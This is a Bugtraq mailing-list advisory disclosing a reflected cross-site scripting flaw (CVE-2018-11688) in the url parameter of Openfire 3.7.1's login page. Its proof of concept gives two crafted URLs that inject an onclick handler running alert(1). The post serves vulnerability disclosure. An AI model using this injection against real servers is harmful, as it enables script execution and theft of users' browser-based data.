Bugtraq mailing list archives
Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting (CVE-2018-11688)
From: yavuz atlas <yavatlas () gmail com>
Date: Tue, 5 Jun 2018 17:53:18 +0300
I. VULNERABILITY ------------------------- Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting II. CVE REFERENCE ------------------------- CVE-2018-11688 III. VENDOR HOMEPAGE ------------------------- https://www.igniterealtime.org/projects/openfire/ IV. DESCRIPTION ------------------------- url parameter at Openfire Version 3.7.1 has a reflected cross-site scripting vulnerability. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. V. PROOF OF CONCEPT ------------------------- http://domain.net:9090/login.jsp?url=a"onclick="alert(1) http://domain.net:9090/login.jsp?url=a%22onclick=%22alert(1) VI. REFERENCES ------------------------- https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11688 VII. CREDIT ------------------------- Yavuz Atlas - @yavuzatlas_ http://www.biznet.com.tr/biznet-guvenlik-duyurulari
Current thread:
- Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting (CVE-2018-11688) yavuz atlas (Jun 06)